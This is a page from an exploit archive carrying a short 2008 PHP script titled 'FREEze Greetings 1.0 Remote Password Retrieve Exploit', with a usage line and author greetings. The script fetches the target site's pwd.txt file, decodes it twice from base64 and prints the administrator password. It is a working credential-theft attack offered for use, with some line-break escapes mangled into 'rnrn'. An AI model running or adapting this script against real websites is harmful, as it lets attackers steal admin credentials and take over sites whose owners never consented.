[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FREEze Greetings 1.0 Remote Password Retrieve Exploit
# Published : 2008-11-17
# Author : cOndemned
# Previous Title : OpenASP <= 3.0 Blind SQL Injection Vulnerability
# Next Title : E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability
<?php
/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8
*/
echo <<< Header
[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]
Header;
if($argc != 2) printf("[~] Usage : php %s <target_with_path>rnrn", $argv[0]) and exit;
$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^||]+)||!sei', base64_decode($r[1]), $pass))
? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
printf("[~] %s rnrn", $out);
?>
# www.Syue.com [2008-11-17]